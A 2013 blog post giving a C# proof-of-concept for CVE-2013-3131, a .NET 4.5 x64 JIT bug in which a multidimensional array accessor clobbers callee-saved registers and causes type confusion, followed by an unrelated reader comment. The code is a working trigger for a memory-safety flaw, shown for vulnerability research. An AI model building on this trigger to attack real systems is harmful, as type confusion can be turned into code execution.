# Wednesday, July 10, 2013
Type Confusion PoC for CVE-2013-3131 (MS13-052)

I did not discover this vulnerability (Alon Fliess filed the (public) bug report), but I decided to investigate it and write a PoC exploit:

```csharp
using System;
using System.Runtime.CompilerServices;

// Small value type used as the element type of the multidimensional array.
struct Foo {
  byte b1, b2, b3;
}

class U1 { }
class U2 { }

// Reference-typed locals whose registers get clobbered by the generated accessor.
struct StackFields {
  internal object f1;
  internal U1 f2;
  internal U2 f3;
}

class Program {
  long field1;
  long field2;

  static void Main() {
    new Program().Get(new Foo[1, 1]);
  }

  object Get<T>(T[,] arr) {
    StackFields fields = new StackFields();
    fields.f1 = new U1();
    fields.f2 = new U1();
    fields.f3 = new U2();
    object v = arr[0, 0];   // generic multidimensional array access; the generated accessor clobbers RSI/RDI
    field2 = field1;
    return v;
  }
}
```

This requires .NET 4.5 x64 (and must be built/run in release mode).

The bug is that the JIT-generated accessor for the multidimensional array clobbers the RSI and RDI registers, which are callee-saved in the x64 calling convention, so the caller's reference-typed locals held in those registers are corrupted and the runtime ends up with a type-confused object.

Wednesday, July 10, 2013 1:05:47 PM (W. Europe Daylight Time, UTC+02:00)
Tuesday, October 1, 2013 11:29:59 AM (W. Europe Daylight Time, UTC+02:00)
Hi, I tried using IKVMC and successfully converted Java to C#, but I have problems when using the rxtx library: " Attempt to get long field "gnu.io.RXTXPort.eis" with illegal data type conversion to int" when trying to read the input stream from the port. Please help me if you can.